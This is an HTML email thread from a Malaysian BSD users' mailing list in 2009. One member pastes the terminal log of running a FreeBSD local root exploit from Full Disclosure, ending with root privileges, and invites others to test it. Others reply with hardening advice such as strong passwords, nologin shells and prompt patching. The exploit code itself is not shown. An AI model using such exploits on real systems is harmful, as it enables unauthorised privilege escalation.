kalau web application tu vulnerable and boleh lepas masuk ke server mungkin parah juga :)<br><br><div class="gmail_quote">On Wed, Dec 2, 2009 at 3:07 PM, Harisfazillah Jamel <span dir="ltr">&lt;<a href="mailto:linuxmalaysia@gmail.com" target="_blank">linuxmalaysia@gmail.com</a>&gt;</span> wrote:<br>



<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">Sebab itu penting kita pastikan.<br>
<br>
1) password pengguna mesti kuat supaya lambat untuk kena break dan<br>
sempatlah kita untuk patch.<br>
2) System  akaun atau application akaun shell gunakan /dev/null atau<br>
/bin/nologin<br>
3) Akaun tak guna (dormant) kita buang.<br>
4) Nama users kenalah yang pelik-pelik janganlah john mary superman :)<br>
<br>
Bug pasti akan ada. Yang penting cepat atau lambat kita patch. :)<br>
<div><div></div><div><br>
On Wed, Dec 2, 2009 at 2:05 PM, Yusof Khalid - FreeBSD / OpenBSD<br>
&lt;<a href="mailto:fryshadow@gmail.com" target="_blank">fryshadow@gmail.com</a>&gt; wrote:<br>
&gt; $ id<br>
&gt; uid=1002(test) gid=1002(test) groups=1002(test)<br>
&gt; $ sh exploit.sh<br>
&gt; env env.c exploit.sh program.c program.o w00t.so.1.0 FreeBSD local r00t<br>
&gt; zeroday<br>
&gt; by Kingcope<br>
&gt; November 2009<br>
&gt; env.c: In function &#39;main&#39;:<br>
&gt; env.c:5: warning: incompatible implicit declaration of built-in function<br>
&gt; &#39;malloc&#39;<br>
&gt; env.c:9: warning: incompatible implicit declaration of built-in function<br>
&gt; &#39;strcpy&#39;<br>
&gt; env.c:11: warning: incompatible implicit declaration of built-in function<br>
&gt; &#39;execl&#39;<br>
&gt; cp: /tmp/w00t.so.1.0: Permission denied<br>
&gt; /libexec/ld-elf.so.1: environment corrupt; missing value for<br>
&gt; /libexec/ld-elf.so.1: environment corrupt; missing value for<br>
&gt; /libexec/ld-elf.so.1: environment corrupt; missing value for<br>
&gt; /libexec/ld-elf.so.1: environment corrupt; missing value for<br>
&gt; /libexec/ld-elf.so.1: environment corrupt; missing value for<br>
&gt; ALEX-ALEX<br>
&gt; # id<br>
&gt; uid=1002(test) gid=1002(test) euid=0(root) groups=1002(test)<br>
&gt; # uname -a<br>
&gt; FreeBSD <a href="http://proxy.opigateway-local.net" target="_blank">proxy.opigateway-local.net</a> 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri<br>
&gt; May  1 08:49:13 UTC 2009<br>
&gt; root@walker.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386<br>
&gt;<br>
&gt; source : <a href="http://seclists.org/fulldisclosure/2009/Nov/371" target="_blank">http://seclists.org/fulldisclosure/2009/Nov/371</a><br>
&gt;<br>
&gt; dengar 8.0-Release pn kena juga, sape2 leh test dialu2kan :)<br>
&gt; --<br>
&gt; _________________________<br>
&gt; <a href="http://blog.myinfinityx.com" target="_blank">http://blog.myinfinityx.com</a><br>
&gt; _________________________<br>
&gt;<br>
</div></div>&gt; _______________________________________________<br>
&gt; PCBSD-malaysia mailing list<br>
&gt; <a href="mailto:PCBSD-malaysia@lists.pcbsd.org" target="_blank">PCBSD-malaysia@lists.pcbsd.org</a><br>
&gt; <a href="http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia" target="_blank">http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia</a><br>
&gt;<br>
&gt;<br>
<br>
<br>
<br>
--<br>
My Facebook<br>
<a href="http://www.facebook.com/linuxmalaysia" target="_blank">http://www.facebook.com/linuxmalaysia</a><br>
<br>
My Blog<br>
<a href="http://blog.harisfazillah.info/" target="_blank">http://blog.harisfazillah.info/</a><br>
<br>
My Network<br>
<a href="http://linuxdotmy.multiply.com/" target="_blank">http://linuxdotmy.multiply.com/</a><br>
_______________________________________________<br>
PCBSD-malaysia mailing list<br>
<a href="mailto:PCBSD-malaysia@lists.pcbsd.org" target="_blank">PCBSD-malaysia@lists.pcbsd.org</a><br>
<a href="http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia" target="_blank">http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia</a><br>
</blockquote></div><br><br clear="all"><br>-- <br>_________________________<br><a href="http://blog.myinfinityx.com" target="_blank">http://blog.myinfinityx.com</a><br>_________________________<br>